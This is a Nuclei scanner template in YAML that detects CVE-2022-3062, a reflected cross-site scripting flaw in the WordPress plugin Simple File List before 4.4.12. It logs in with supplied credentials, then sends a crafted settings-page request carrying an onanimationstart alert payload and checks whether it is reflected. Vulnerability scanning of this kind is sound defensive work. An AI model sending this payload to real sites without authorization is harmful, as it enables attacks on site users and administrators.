50 lines
1.6 KiB
YAML
50 lines
1.6 KiB
YAML
id: CVE-2022-3062
|
|
|
|
info:
|
|
name: Simple File List < 4.4.12 - Cross Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
|
|
reference:
|
|
- https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3062
|
|
- https://wordpress.org/plugins/simple-file-list/
|
|
remediation: Fixed in version 4.4.12
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-3062
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00071
|
|
cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
framework: wordpress
|
|
vendor: simplefilelist
|
|
product: simple-file-list
|
|
tags: cve,authenticated,wordpress,wp-plugin,wp,wpscan,cve2022,xss,simple-file-list
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "ee-simple-file-list")'
|
|
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
|
|
condition: and
|